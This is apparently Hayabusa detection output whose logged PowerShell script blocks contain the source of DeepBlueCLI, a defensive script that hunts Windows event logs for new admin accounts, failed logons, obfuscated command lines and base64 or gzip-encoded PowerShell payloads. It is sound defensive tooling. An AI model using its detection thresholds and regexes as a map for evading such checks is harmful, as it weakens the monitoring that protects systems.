$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" 
{$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. 
# If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:20.569 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the 
events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message 
is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength 
$regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. 
# Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" 
{$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. 
# If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:20.569 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:20.569 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:20.569 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:20.572 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. 
$groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
